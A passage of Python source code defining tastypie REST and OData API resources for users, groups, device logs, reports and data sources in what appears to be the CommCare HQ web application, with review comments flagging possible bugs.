    :param fields: document fields to return per hit.
    :param size: page size; ``start_at`` is the page offset.
    """
    query = (UserES()
             .domain(domain)
             .fields(fields)
             .size(size)
             .start(start_at))
    if q is not None:
        # NOTE(review): set_query's return value is discarded. If UserES
        # builders are immutable (each call returning a new query, like
        # the chained calls above), this line is a no-op and would need
        # `query = query.set_query(...)` -- confirm against ESQuery
        # semantics before changing.
        query.set_query({"query_string": {"query": q}})
    return query.run().hits
def _set_role_for_bundle(kwargs, bundle):
    """Assign the role named in bundle.data to bundle.obj for the domain.

    Raises BadRequest when no role of that name exists in the domain.
    """
    domain = kwargs['domain']
    # check for roles associated with the domain
    matching_roles = UserRole.objects.by_domain_and_name(domain, bundle.data.get('role'))
    if not matching_roles:
        raise BadRequest(f"Invalid User Role '{bundle.data.get('role')}'")
    # Role names are not unique; mirror previous behavior by taking the
    # first match.
    bundle.obj.set_role(domain, matching_roles[0].get_qualified_id())
class BulkUserResource(HqBaseResource, DomainSpecificResourceMixin):
    """
    A read-only user data resource based on elasticsearch.
    Supported Params: limit offset q fields
    """
    type = "bulk-user"
    id = fields.CharField(attribute='id', readonly=True, unique=True)
    email = fields.CharField(attribute='email')
    username = fields.CharField(attribute='username', unique=True)
    first_name = fields.CharField(attribute='first_name', null=True)
    last_name = fields.CharField(attribute='last_name', null=True)
    phone_numbers = fields.ListField(attribute='phone_numbers', null=True)

    @staticmethod
    def to_obj(user):
        '''
        Takes a flat dict and returns an object
        '''
        # ES documents carry '_id'; the API exposes it as 'id'.
        if '_id' in user:
            user['id'] = user.pop('_id')
        return namedtuple('user', list(user))(**user)

    class Meta(CustomResourceMeta):
        authentication = RequirePermissionAuthentication(Permissions.edit_commcare_users)
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get']
        object_class = object
        resource_name = 'bulk-user'

    def dehydrate(self, bundle):
        # When ?fields= is given, strip the response down to just those
        # fields; otherwise return the bundle unchanged.
        fields = bundle.request.GET.getlist('fields')
        data = {}
        if not fields:
            return bundle
        for field in fields:
            data[field] = bundle.data[field]
        bundle.data = data
        return bundle

    def obj_get_list(self, bundle, **kwargs):
        # Validate requested fields against the resource's declared set.
        request_fields = bundle.request.GET.getlist('fields')
        for field in request_fields:
            if field not in self.fields:
                raise BadRequest('{0} is not a valid field'.format(field))
        params = bundle.request.GET
        param = lambda p: params.get(p, None)
        fields = list(self.fields)
        # Ask ES for the raw '_id' instead of the API-level 'id' alias;
        # to_obj maps it back.
        fields.remove('id')
        fields.append('_id')
        # MOCK_BULK_USER_ES lets tests stub out the elasticsearch call.
        fn = MOCK_BULK_USER_ES or user_es_call
        users = fn(
            domain=kwargs['domain'],
            q=param('q'),
            fields=fields,
            size=param('limit'),
            start_at=param('offset'),
        )
        return list(map(self.to_obj, users))

    def detail_uri_kwargs(self, bundle_or_obj):
        return {
            'pk': get_obj(bundle_or_obj).id
        }
class CommCareUserResource(v0_1.CommCareUserResource):
    """v0.5 mobile-worker resource: extends v0.1 with create/update/delete."""

    class Meta(v0_1.CommCareUserResource.Meta):
        detail_allowed_methods = ['get', 'put', 'delete']
        list_allowed_methods = ['get', 'post']
        always_return_data = True

    def serialize(self, request, data, format, options=None):
        # POST responses carry only the created user's id.
        if not isinstance(data, dict) and request.method == 'POST':
            data = {'id': data.obj._id}
        return self._meta.serializer.serialize(data, format, options)

    def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
        if bundle_or_obj is None:
            return super(CommCareUserResource, self).get_resource_uri(bundle_or_obj, url_name)
        elif isinstance(bundle_or_obj, Bundle):
            obj = bundle_or_obj.obj
        else:
            obj = bundle_or_obj
        return reverse('api_dispatch_detail', kwargs=dict(resource_name=self._meta.resource_name,
                                                          domain=obj.domain,
                                                          api_name=self._meta.api_name,
                                                          pk=obj._id))

    def obj_create(self, bundle, **kwargs):
        try:
            bundle.obj = CommCareUser.create(
                domain=kwargs['domain'],
                username=bundle.data['username'].lower(),
                password=bundle.data['password'],
                created_by=bundle.request.couch_user,
                created_via=USER_CHANGE_VIA_API,
                email=bundle.data.get('email', '').lower(),
            )
            # password was just set
            bundle.data.pop('password', None)
            # do not call update with username key
            bundle.data.pop('username', None)
            self._update(bundle)
            bundle.obj.save()
        except Exception:
            # Roll back the partially-created user (retire the couch doc
            # and delete its django auth user) before re-raising.
            if bundle.obj._id:
                bundle.obj.retire(bundle.request.domain, deleted_by=bundle.request.couch_user,
                                  deleted_via=USER_CHANGE_VIA_API)
            try:
                django_user = bundle.obj.get_django_user()
            except User.DoesNotExist:
                pass
            else:
                django_user.delete()
            raise
        return bundle

    def obj_update(self, bundle, **kwargs):
        bundle.obj = CommCareUser.get(kwargs['pk'])
        # The edited user must belong to the URL's domain.
        assert bundle.obj.domain == kwargs['domain']
        user_change_logger = self._get_user_change_logger(bundle)
        errors = self._update(bundle, user_change_logger)
        if errors:
            formatted_errors = ', '.join(errors)
            raise BadRequest(_('The request resulted in the following errors: {}').format(formatted_errors))
        assert bundle.obj.domain == kwargs['domain']
        bundle.obj.save()
        user_change_logger.save()
        return bundle

    def obj_delete(self, bundle, **kwargs):
        user = CommCareUser.get(kwargs['pk'])
        if user:
            user.retire(bundle.request.domain, deleted_by=bundle.request.couch_user,
                        deleted_via=USER_CHANGE_VIA_API)
        # NOTE(review): this *returns* an ImmediateHttpResponse instead of
        # raising it; tastypie ignores obj_delete's return value, so the
        # HttpAccepted here may never be sent -- confirm intended behavior.
        return ImmediateHttpResponse(response=http.HttpAccepted())

    @classmethod
    def _update(cls, bundle, user_change_logger=None):
        """Apply each key in bundle.data to the user; return error strings."""
        errors = []
        for key, value in bundle.data.items():
            try:
                update(bundle.obj, key, value, user_change_logger)
            except InvalidFieldException as e:
                errors.append(_("Attempted to update unknown or non-editable field '{}'").format(e.field))
            except InvalidFormatException as e:
                errors.append(_('{} must be a {}').format(e.field, e.expected_type))
            except (UpdateConflictException, ValidationError) as e:
                errors.append(e.message)
        return errors
class WebUserResource(v0_1.WebUserResource):

    def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
        """Build the detail URI for a web user within the request's domain.

        NOTE(review): if called with a bare object (neither a Bundle nor
        None), `domain` and `obj` are never assigned and the `reverse`
        call below raises NameError -- an `else` branch appears to be
        missing. Confirm callers only ever pass a Bundle or None.
        """
        if isinstance(bundle_or_obj, Bundle):
            domain = bundle_or_obj.request.domain
            obj = bundle_or_obj.obj
        elif bundle_or_obj is None:
            return None
        return reverse('api_dispatch_detail', kwargs=dict(resource_name=self._meta.resource_name,
                                                          domain=domain,
                                                          api_name=self._meta.api_name,
                                                          pk=obj._id))
class AdminWebUserResource(v0_1.UserResource):
    """Superuser-only read access to web users across all domains."""
    domains = fields.ListField(attribute='domains')

    def obj_get(self, bundle, **kwargs):
        return WebUser.get(kwargs['pk'])

    def obj_get_list(self, bundle, **kwargs):
        # Exact username lookup when provided; otherwise all web users
        # from elasticsearch.
        if 'username' in bundle.request.GET:
            return [WebUser.get_by_username(bundle.request.GET['username'])]
        return [WebUser.wrap(u) for u in UserES().web_users().run().hits]

    class Meta(WebUserResource.Meta):
        authentication = AdminAuthentication()
        detail_allowed_methods = ['get']
        list_allowed_methods = ['get']
class GroupResource(v0_4.GroupResource):
    """v0.5 group resource: adds create/update/delete and bulk PATCH."""

    class Meta(v0_4.GroupResource.Meta):
        detail_allowed_methods = ['get', 'put', 'delete']
        list_allowed_methods = ['get', 'post', 'patch']
        always_return_data = True

    def serialize(self, request, data, format, options=None):
        # Collapse bundle responses to a minimal payload: the error
        # message if present, or (for POST) just the new group's id.
        if not isinstance(data, dict):
            if 'error_message' in data.data:
                data = {'error_message': data.data['error_message']}
            elif request.method == 'POST':
                data = {'id': data.obj._id}
        return self._meta.serializer.serialize(data, format, options)

    def patch_list(self, request=None, **kwargs):
        """
        Exactly copied from https://github.com/toastdriven/django-tastypie/blob/v0.9.14/tastypie/resources.py#L1466
        (BSD licensed) and modified to pass the kwargs to `obj_create` and support only create method
        """
        request = convert_post_to_patch(request)
        deserialized = self.deserialize(request, request.body, format=request.META.get('CONTENT_TYPE', 'application/json'))

        collection_name = self._meta.collection_name
        if collection_name not in deserialized:
            raise BadRequest("Invalid data sent: missing '%s'" % collection_name)

        if len(deserialized[collection_name]) and 'put' not in self._meta.detail_allowed_methods:
            raise ImmediateHttpResponse(response=http.HttpMethodNotAllowed())

        bundles_seen = []
        status = http.HttpAccepted
        for data in deserialized[collection_name]:
            data = self.alter_deserialized_detail_data(request, data)
            bundle = self.build_bundle(data=dict_strip_unicode_keys(data), request=request)
            try:
                self.obj_create(bundle=bundle, **self.remove_api_resource_names(kwargs))
            except AssertionError as e:
                # obj_create signals "name already exists" via
                # AssertionError; record it per-item and downgrade the
                # overall response status.
                status = http.HttpBadRequest
                bundle.data['_id'] = str(e)
            bundles_seen.append(bundle)

        # Response body is the list of created ids (or error strings).
        to_be_serialized = [bundle.data['_id'] for bundle in bundles_seen]
        return self.create_response(request, to_be_serialized, response_class=status)

    def post_list(self, request, **kwargs):
        """
        Exactly copied from https://github.com/toastdriven/django-tastypie/blob/v0.9.14/tastypie/resources.py#L1314
        (BSD licensed) and modified to catch Exception and not returning traceback
        """
        deserialized = self.deserialize(request, request.body, format=request.META.get('CONTENT_TYPE', 'application/json'))
        deserialized = self.alter_deserialized_detail_data(request, deserialized)
        bundle = self.build_bundle(data=dict_strip_unicode_keys(deserialized), request=request)
        try:
            updated_bundle = self.obj_create(bundle, **self.remove_api_resource_names(kwargs))
            location = self.get_resource_uri(updated_bundle)

            if not self._meta.always_return_data:
                return http.HttpCreated(location=location)
            else:
                updated_bundle = self.full_dehydrate(updated_bundle)
                updated_bundle = self.alter_detail_data_to_serialize(request, updated_bundle)
                return self.create_response(request, updated_bundle, response_class=http.HttpCreated, location=location)
        except AssertionError as e:
            bundle.data['error_message'] = str(e)
            return self.create_response(request, bundle, response_class=http.HttpBadRequest)

    def _update(self, bundle):
        """Apply bundle.data onto bundle.obj; return True if anything changed."""
        should_save = False
        for key, value in bundle.data.items():
            if key == 'name' and getattr(bundle.obj, key, None) != value:
                if not Group.by_name(bundle.obj.domain, value):
                    setattr(bundle.obj, key, value or '')
                    should_save = True
                else:
                    raise Exception("A group with this name already exists")
            # NOTE: the `elif` below pairs with this `if`, so keys other
            # than 'users' fall through to the generic setattr branch
            # ('name' was already applied above, making its elif test
            # false).
            if key == 'users' and getattr(bundle.obj, key, None) != value:
                users_to_add = set(value) - set(bundle.obj.users)
                users_to_remove = set(bundle.obj.users) - set(value)
                for user in users_to_add:
                    bundle.obj.add_user(user)
                    should_save = True
                for user in users_to_remove:
                    bundle.obj.remove_user(user)
                    should_save = True
            elif getattr(bundle.obj, key, None) != value:
                setattr(bundle.obj, key, value)
                should_save = True
        return should_save

    def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
        if bundle_or_obj is None:
            return super(GroupResource, self).get_resource_uri(bundle_or_obj, url_name)
        elif isinstance(bundle_or_obj, Bundle):
            obj = bundle_or_obj.obj
        else:
            obj = bundle_or_obj
        return self._get_resource_uri(obj)

    def _get_resource_uri(self, obj):
        # This function is called up to 1000 times per request
        # so build url from a known string template
        # to avoid calling the expensive `reverse` function each time
        return self._get_resource_uri_template.format(domain=obj.domain, pk=obj._id)

    @memoized_property
    def _get_resource_uri_template(self):
        """Returns the literal string "/a/{domain}/api/v0.5/group/{pk}/" in a DRY way"""
        return reverse('api_dispatch_detail', kwargs=dict(
            resource_name=self._meta.resource_name,
            api_name=self._meta.api_name,
            domain='__domain__',
            pk='__pk__')).replace('__pk__', '{pk}').replace('__domain__', '{domain}')

    def obj_create(self, bundle, request=None, **kwargs):
        # Group names must be unique within a domain.
        if not Group.by_name(kwargs['domain'], bundle.data.get("name")):
            bundle.obj = Group(bundle.data)
            bundle.obj.name = bundle.obj.name or ''
            bundle.obj.domain = kwargs['domain']
            bundle.obj.save()
            for user in bundle.obj.users:
                CommCareUser.get(user).set_groups([bundle.obj._id])
        else:
            raise AssertionError("A group with name %s already exists" % bundle.data.get("name"))
        return bundle

    def obj_update(self, bundle, **kwargs):
        bundle.obj = Group.get(kwargs['pk'])
        assert bundle.obj.domain == kwargs['domain']
        if self._update(bundle):
            assert bundle.obj.domain == kwargs['domain']
            bundle.obj.save()
        return bundle

    def obj_delete(self, bundle, **kwargs):
        group = self.obj_get(bundle, **kwargs)
        # Soft delete keeps the doc recoverable.
        group.soft_delete()
        return bundle
class DomainAuthorization(ReadOnlyAuthorization):
    """Read-only authorization that scopes querysets to the request's domain."""

    def __init__(self, domain_key='domain', *args, **kwargs):
        # NOTE(review): *args/**kwargs are accepted but dropped and
        # super().__init__ is never called -- harmless if the tastypie
        # Authorization base takes no constructor state, but confirm.
        self.domain_key = domain_key

    def read_list(self, object_list, bundle):
        # e.g. queryset.filter(domain=<request domain>)
        return object_list.filter(**{self.domain_key: bundle.request.domain})
class DeviceReportResource(HqBaseResource, ModelResource):
    """Read-only access to phone device logs (DeviceReportEntry rows)."""

    class Meta(object):
        queryset = DeviceReportEntry.objects.all()
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get']
        resource_name = 'device-log'
        authentication = RequirePermissionAuthentication(Permissions.edit_data)
        # DomainAuthorization filters every queryset to the request's domain.
        authorization = DomainAuthorization()
        # NoCountingPaginator presumably skips total-count queries on this
        # large table -- see pagination module for specifics.
        paginator_class = NoCountingPaginator
        filtering = {
            # this is needed for the domain filtering but any values passed in via the URL get overridden
            "domain": ('exact',),
            "date": ('exact', 'gt', 'gte', 'lt', 'lte', 'range'),
            "user_id": ('exact',),
            "username": ('exact',),
            "type": ('exact',),
            "xform_id": ('exact',),
            "device_id": ('exact',),
        }
# Container returned by ConfigurableReportDataResource.obj_get; mirrors the
# fields declared on that resource plus paging context (get_params).
ConfigurableReportData = namedtuple("ConfigurableReportData", [
    "data", "columns", "id", "domain", "total_records", "get_params", "next_page"
])
class ConfigurableReportDataResource(HqBaseResource, DomainSpecificResourceMixin):
    """
    A resource that replicates the behavior of the ajax part of the
    ConfigurableReportView view.
    """
    data = fields.ListField(attribute="data", readonly=True)
    columns = fields.ListField(attribute="columns", readonly=True)
    total_records = fields.IntegerField(attribute="total_records", readonly=True)
    next_page = fields.CharField(attribute="next_page", readonly=True)

    LIMIT_DEFAULT = 50
    LIMIT_MAX = 50

    def _get_start_param(self, bundle):
        """Parse the zero-based 'offset' GET param (default 0)."""
        try:
            start = int(bundle.request.GET.get('offset', 0))
            if start < 0:
                raise ValueError
        except (ValueError, TypeError):
            # Fixed: the GET parameter is named "offset" (not "start"),
            # and 0 is accepted, so ask for a non-negative integer.
            raise BadRequest("offset must be a non-negative integer.")
        return start

    def _get_limit_param(self, bundle):
        """Parse the 'limit' GET param, capped at LIMIT_MAX."""
        try:
            limit = int(bundle.request.GET.get('limit', self.LIMIT_DEFAULT))
            if limit < 0:
                raise ValueError
        except (ValueError, TypeError):
            raise BadRequest("limit must be a positive integer.")

        if limit > self.LIMIT_MAX:
            raise BadRequest("Limit may not exceed {}.".format(self.LIMIT_MAX))
        return limit

    def _get_next_page(self, domain, id_, start, limit, total_records, get_query_dict):
        """Return the URL of the next page, or "" on the last page."""
        if total_records > start + limit:
            start += limit
            new_get_params = get_query_dict.copy()
            new_get_params["offset"] = start
            # limit has not changed, but it may not have been present in get params before.
            new_get_params["limit"] = limit
            return reverse('api_dispatch_detail', kwargs=dict(
                api_name=self._meta.api_name,
                resource_name=self._meta.resource_name,
                domain=domain,
                pk=id_,
            )) + "?" + new_get_params.urlencode()
        else:
            return ""

    def _get_report_data(self, report_config, domain, start, limit, get_params, couch_user):
        """Run the report and return (rows, column descriptors, total)."""
        report = ConfigurableReportDataSource.from_spec(report_config, include_prefilters=True)

        # Renamed from `filter` so the builtin is not shadowed.
        string_type_params = [
            ui_filter.name
            for ui_filter in report_config.ui_filters
            if getattr(ui_filter, 'datatype', 'string') == "string"
        ]
        filter_values = get_filter_values(
            report_config.ui_filters,
            query_dict_to_dict(get_params, domain, string_type_params),
            couch_user,
        )
        report.set_filter_values(filter_values)

        page = list(report.get_data(start=start, limit=limit))

        columns = []
        for column in report.columns:
            simple_column = {
                "header": column.header,
                "slug": column.slug,
            }
            if isinstance(column, UCRExpandDatabaseSubcolumn):
                simple_column['expand_column_value'] = column.expand_value
            columns.append(simple_column)

        total_records = report.get_total_records()
        return page, columns, total_records

    def obj_get(self, bundle, **kwargs):
        domain = kwargs['domain']
        pk = kwargs['pk']
        start = self._get_start_param(bundle)
        limit = self._get_limit_param(bundle)

        report_config = self._get_report_configuration(pk, domain)
        page, columns, total_records = self._get_report_data(
            report_config, domain, start, limit, bundle.request.GET, bundle.request.couch_user)

        return ConfigurableReportData(
            data=page,
            columns=columns,
            total_records=total_records,
            id=report_config._id,
            domain=domain,
            get_params=bundle.request.GET,
            next_page=self._get_next_page(
                domain,
                report_config._id,
                start,
                limit,
                total_records,
                bundle.request.GET,
            )
        )

    def _get_report_configuration(self, id_, domain):
        """
        Fetch the required ReportConfiguration object
        :param id_: The id of the ReportConfiguration
        :param domain: The domain of the ReportConfiguration
        :return: A ReportConfiguration
        """
        try:
            if report_config_id_is_static(id_):
                return StaticReportConfiguration.by_id(id_, domain=domain)
            else:
                return get_report_config_or_not_found(domain, id_)
        except DocumentNotFound:
            raise NotFound

    def detail_uri_kwargs(self, bundle_or_obj):
        return {
            'domain': get_obj(bundle_or_obj).domain,
            'pk': get_obj(bundle_or_obj).id,
        }

    def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_list'):
        uri = super(ConfigurableReportDataResource, self).get_resource_uri(bundle_or_obj, url_name)
        if bundle_or_obj is not None and uri:
            # Make paging explicit in the reported URI.
            get_params = get_obj(bundle_or_obj).get_params.copy()
            if "offset" not in get_params:
                get_params["offset"] = 0
            if "limit" not in get_params:
                get_params["limit"] = self.LIMIT_DEFAULT
            uri += "?{}".format(get_params.urlencode())
        return uri

    class Meta(CustomResourceMeta):
        authentication = RequirePermissionAuthentication(Permissions.view_reports, allow_session_auth=True)
        list_allowed_methods = []
        detail_allowed_methods = ["get"]
class SimpleReportConfigurationResource(CouchResourceMixin, HqBaseResource, DomainSpecificResourceMixin):
    """Read-only metadata (title, filters, columns) for configurable reports."""
    id = fields.CharField(attribute='get_id', readonly=True, unique=True)
    title = fields.CharField(readonly=True, attribute="title", null=True)
    filters = fields.ListField(readonly=True)
    columns = fields.ListField(readonly=True)

    def dehydrate_filters(self, bundle):
        # Expose only the filter attributes API clients need.
        obj_filters = bundle.obj.filters
        return [{
            "type": f["type"],
            "datatype": f["datatype"],
            "slug": f["slug"]
        } for f in obj_filters]

    def dehydrate_columns(self, bundle):
        obj_columns = bundle.obj.columns
        return [{
            "column_id": c['column_id'],
            "display": c['display'],
            "type": c["type"],
        } for c in obj_columns]

    def obj_get(self, bundle, **kwargs):
        domain = kwargs['domain']
        pk = kwargs['pk']
        try:
            report_configuration = get_document_or_404(ReportConfiguration, domain, pk)
        except Http404 as e:
            # Translate Django's Http404 into tastypie's NotFound.
            raise NotFound(str(e))
        return report_configuration

    def obj_get_list(self, bundle, **kwargs):
        domain = kwargs['domain']
        return get_configurable_and_static_reports(domain)

    def detail_uri_kwargs(self, bundle_or_obj):
        return {
            'domain': get_obj(bundle_or_obj).domain,
            'pk': get_obj(bundle_or_obj)._id,
        }

    class Meta(CustomResourceMeta):
        list_allowed_methods = ["get"]
        detail_allowed_methods = ["get"]
        # Return the full list without pagination.
        paginator_class = DoesNothingPaginator
class DataSourceConfigurationResource(CouchResourceMixin, HqBaseResource, DomainSpecificResourceMixin):
    """
    API resource for DataSourceConfigurations (UCR data sources)
    """
    id = fields.CharField(attribute='get_id', readonly=True, unique=True)
    display_name = fields.CharField(attribute="display_name", null=True)
    # Heavyweight spec fields are only serialized on detail views.
    configured_filter = fields.DictField(attribute="configured_filter", use_in='detail')
    configured_indicators = fields.ListField(attribute="configured_indicators", use_in='detail')

    def _ensure_toggle_enabled(self, request):
        # Hard 401 (with CORS headers) unless the UCR feature flag is on
        # for this request.
        if not toggles.USER_CONFIGURABLE_REPORTS.enabled_for_request(request):
            raise ImmediateHttpResponse(
                add_cors_headers_to_response(
                    HttpResponse(
                        json.dumps({"error": _("You don't have permission to access this API")}),
                        content_type="application/json",
                        status=401,
                    )
                )
            )

    def obj_get(self, bundle, **kwargs):
        self._ensure_toggle_enabled(bundle.request)
        domain = kwargs['domain']
        pk = kwargs['pk']
        try:
            data_source = get_document_or_404(DataSourceConfiguration, domain, pk)
        except Http404 as e:
            raise NotFound(str(e))
        return data_source

    def obj_get_list(self, bundle, **kwargs):
        self._ensure_toggle_enabled(bundle.request)
        domain = kwargs['domain']
        return get_datasources_for_domain(domain)

    def obj_update(self, bundle, **kwargs):
        # Only a whitelisted subset of fields may be changed via PUT;
        # other keys in the payload are silently ignored.
        self._ensure_toggle_enabled(bundle.request)
        domain = kwargs['domain']
        pk = kwargs['pk']
        try:
            data_source = get_document_or_404(DataSourceConfiguration, domain, pk)
        except Http404 as e:
            raise NotFound(str(e))
        allowed_update_fields = [
            'display_name',
            'configured_filter',
            'configured_indicators',
        ]
        for key, value in bundle.data.items():
            if key in allowed_update_fields:
                data_source[key] = value
        try:
            data_source.validate()
            data_source.save()
        except BadSpecError as e:
            # Invalid spec: surface the validation details as a 500.
            raise ImmediateHttpResponse(
                add_cors_headers_to_response(
                    HttpResponse(
                        json.dumps({"error": _("Invalid data source! Details: {details}").format(details=str(e))}),
                        content_type="application/json",
                        status=500,
                    )
                )
            )
        bundle.obj = data_source
        return bundle

    def detail_uri_kwargs(self, bundle_or_obj):
        return {
            'domain': get_obj(bundle_or_obj).domain,
            'pk': get_obj(bundle_or_obj)._id,
        }

    class Meta(CustomResourceMeta):
        resource_name = 'ucr_data_source'
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get', 'put']
        always_return_data = True
        paginator_class = DoesNothingPaginator
        authentication = RequirePermissionAuthentication(Permissions.edit_ucrs)
# Lightweight row object serialized by UserDomainsResource.
# Both fields default to '' so partially-filled rows still serialize.
UserDomain = namedtuple('UserDomain', 'domain_name project_name')
UserDomain.__new__.__defaults__ = ('', '')
class UserDomainsResource(CorsResourceMixin, Resource):
    """List the Zapier-enabled domains the authenticated user may access."""
    domain_name = fields.CharField(attribute='domain_name')
    project_name = fields.CharField(attribute='project_name')

    class Meta(object):
        resource_name = 'user_domains'
        authentication = LoginAuthentication(allow_session_auth=True)
        object_class = UserDomain
        include_resource_uri = False

    def dispatch_list(self, request, **kwargs):
        # Replace tastypie's default 401 body with a clearer message.
        try:
            return super(UserDomainsResource, self).dispatch_list(request, **kwargs)
        except ImmediateHttpResponse as exc:
            if not isinstance(exc.response, HttpUnauthorized):
                raise
            raise ImmediateHttpResponse(
                response=HttpUnauthorized(
                    content='Username or API Key is incorrect', content_type='text/plain'
                )
            )

    def obj_get_list(self, bundle, **kwargs):
        feature_flag = bundle.request.GET.get("feature_flag")
        if feature_flag and feature_flag not in toggles.all_toggles_slug():
            raise BadRequest(f"{feature_flag!r} is not a valid feature flag")
        return self.get_object_list(bundle.request, feature_flag)

    def get_object_list(self, request, feature_flag=None):
        couch_user = CouchUser.from_django_user(request.user)
        accessible_domains = []
        for domain_name in couch_user.get_domains():
            # Only Zapier-privileged domains, optionally narrowed by flag.
            if not domain_has_privilege(domain_name, privileges.ZAPIER_INTEGRATION):
                continue
            project = Domain.get_by_name(domain_name)
            if feature_flag and feature_flag not in toggles.toggles_dict(domain=domain_name):
                continue
            accessible_domains.append(UserDomain(
                domain_name=project.name,
                project_name=project.hr_name or project.name
            ))
        return accessible_domains
class IdentityResource(CorsResourceMixin, Resource):
    """Return basic profile information about the authenticated user."""
    id = fields.CharField(attribute='get_id', readonly=True)
    username = fields.CharField(attribute='username', readonly=True)
    first_name = fields.CharField(attribute='first_name', readonly=True)
    last_name = fields.CharField(attribute='last_name', readonly=True)
    email = fields.CharField(attribute='email', readonly=True)

    def obj_get_list(self, bundle, **kwargs):
        # The "list" is always exactly the requesting user.
        return [bundle.request.couch_user]

    class Meta(object):
        resource_name = 'identity'
        authentication = LoginAuthentication()
        # Collapses the one-element list into a single JSON object.
        serializer = ListToSingleObjectSerializer()
        detail_allowed_methods = []
        list_allowed_methods = ['get']
        object_class = CouchUser
        include_resource_uri = False
# (xmlns, display name) pair served by DomainForms; both default to ''.
Form = namedtuple('Form', ['form_xmlns', 'form_name'])
Form.__new__.__defaults__ = ('', '')
class DomainForms(Resource):
    """
    Returns: list of forms for a given domain with form name formatted for display in Zapier
    """
    form_xmlns = fields.CharField(attribute='form_xmlns')
    form_name = fields.CharField(attribute='form_name')

    class Meta(object):
        resource_name = 'domain_forms'
        authentication = RequirePermissionAuthentication(Permissions.access_api)
        object_class = Form
        include_resource_uri = False
        allowed_methods = ['get']
        limit = 200
        max_limit = 1000

    def obj_get_list(self, bundle, **kwargs):
        """Return Form tuples for every form in the requested application."""
        application_id = bundle.request.GET.get('application_id')
        if not application_id:
            raise NotFound('application_id parameter required')

        application = Application.get(docid=application_id)
        if not application:
            return []

        # Display name is "App > Module > Form", as shown in Zapier.
        return [
            Form(
                form_xmlns=entry['form'].xmlns,
                form_name='{} > {} > {}'.format(
                    application.name,
                    entry['module'].default_name(),
                    entry['form'].default_name(),
                ),
            )
            for entry in application.get_forms(bare=False)
        ]
# Zapier requires id and name; case_type has no obvious id, placeholder inserted instead.
# Case-type record; 'placeholder' exists only because Zapier wants two fields.
CaseType = namedtuple('CaseType', ['case_type', 'placeholder'])
CaseType.__new__.__defaults__ = ('', '')
class DomainCases(Resource):
    """
    Returns: list of case types for a domain

    Note: only returns case types for which at least one case has been made
    """
    placeholder = fields.CharField(attribute='placeholder')
    case_type = fields.CharField(attribute='case_type')

    class Meta(object):
        resource_name = 'domain_cases'
        authentication = RequirePermissionAuthentication(Permissions.access_api)
        object_class = CaseType
        include_resource_uri = False
        allowed_methods = ['get']
        limit = 100
        max_limit = 1000

    def obj_get_list(self, bundle, **kwargs):
        """Return CaseType tuples for the domain, sourced from Elasticsearch."""
        return [
            CaseType(case_type=name)
            for name in get_case_types_for_domain_es(kwargs['domain'])
        ]
# (id, username) pair served by DomainUsernames; both default to ''.
UserInfo = namedtuple('UserInfo', ['user_id', 'user_name'])
UserInfo.__new__.__defaults__ = ('', '')
class DomainUsernames(Resource):
    """
    Returns: list of usernames for a domain.
    """
    user_id = fields.CharField(attribute='user_id')
    user_name = fields.CharField(attribute='user_name')

    class Meta(object):
        resource_name = 'domain_usernames'
        authentication = RequirePermissionAuthentication(Permissions.view_commcare_users)
        object_class = User
        include_resource_uri = False
        allowed_methods = ['get']

    def obj_get_list(self, bundle, **kwargs):
        """Return (id, username) pairs for every user in the domain."""
        pairs = get_all_user_id_username_pairs_by_domain(kwargs['domain'])
        return [
            UserInfo(user_id=user_id, user_name=raw_username(username))
            for user_id, username in pairs
        ]
class BaseODataResource(HqBaseResource, DomainSpecificResourceMixin):
    """Shared plumbing for the OData case/form feed resources."""
    # Populated per-request in dispatch() from the URL kwargs.
    config_id = None
    table_id = None

    def dispatch(self, request_type, request, **kwargs):
        """Gate on the ODATA_FEED privilege, time the request, and record metrics."""
        if not domain_has_privilege(request.domain, privileges.ODATA_FEED):
            raise ImmediateHttpResponse(
                response=HttpResponseNotFound('Feature flag not enabled.')
            )
        self.config_id = kwargs['config_id']
        # URLs without an explicit table_id refer to the primary table (0).
        self.table_id = int(kwargs.get('table_id', 0))
        with TimingContext() as timer:
            response = super(BaseODataResource, self).dispatch(
                request_type, request, **kwargs
            )
        record_feed_access_in_datadog(request, self.config_id, timer.duration, response)
        return response

    def create_response(self, request, data, response_class=HttpResponse,
                        **response_kwargs):
        """Attach request context to the payload and add OData headers.

        The serializer needs domain/config_id/api_path/table_id to build
        OData metadata URLs, so they are stashed on the response data here.
        """
        data['domain'] = request.domain
        data['config_id'] = self.config_id
        data['api_path'] = request.path
        data['table_id'] = self.table_id
        response = super(BaseODataResource, self).create_response(
            request, data, response_class, **response_kwargs)
        return add_odata_headers(response)

    def detail_uri_kwargs(self, bundle_or_obj):
        # Not sure why this is required but the feed 500s without it
        return {
            'pk': get_obj(bundle_or_obj)['_id']
        }

    def determine_format(self, request):
        # Results should be sent as JSON
        return 'application/json'
@location_safe
class ODataCaseResource(BaseODataResource):
    """OData feed over cases for a saved CaseExportInstance configuration."""

    def obj_get_list(self, bundle, domain, **kwargs):
        """Build the (possibly location-restricted) ES query for the feed."""
        config = get_document_or_404(CaseExportInstance, domain, self.config_id)
        if raise_odata_permissions_issues(bundle.request.couch_user, domain, config):
            raise ImmediateHttpResponse(
                HttpForbidden(gettext_noop(
                    "You do not have permission to view this feed."
                ))
            )
        query = get_case_export_base_query(domain, config.case_type)
        # Renamed loop variable: the original shadowed the `filter` builtin.
        for export_filter in config.get_filters():
            query = query.filter(export_filter.to_es_filter())

        # Users without access_all_locations only see cases in their locations.
        if not bundle.request.couch_user.has_permission(
            domain, 'access_all_locations'
        ):
            query = query_location_restricted_cases(query, bundle.request)

        return query

    class Meta(v0_4.CommCareCaseResource.Meta):
        authentication = ODataAuthentication()
        resource_name = 'odata/cases'
        serializer = ODataCaseSerializer()
        limit = 2000
        max_limit = 10000

    def prepend_urls(self):
        """Route both the per-table and single-table feed URL forms."""
        return [
            url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/(?P<table_id>[\d]+)/feed".format(
                self._meta.resource_name), self.wrap_view('dispatch_list')),
            url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/feed".format(
                self._meta.resource_name), self.wrap_view('dispatch_list')),
        ]
@location_safe
class ODataFormResource(BaseODataResource):
    """OData feed over form submissions for a saved FormExportInstance configuration."""

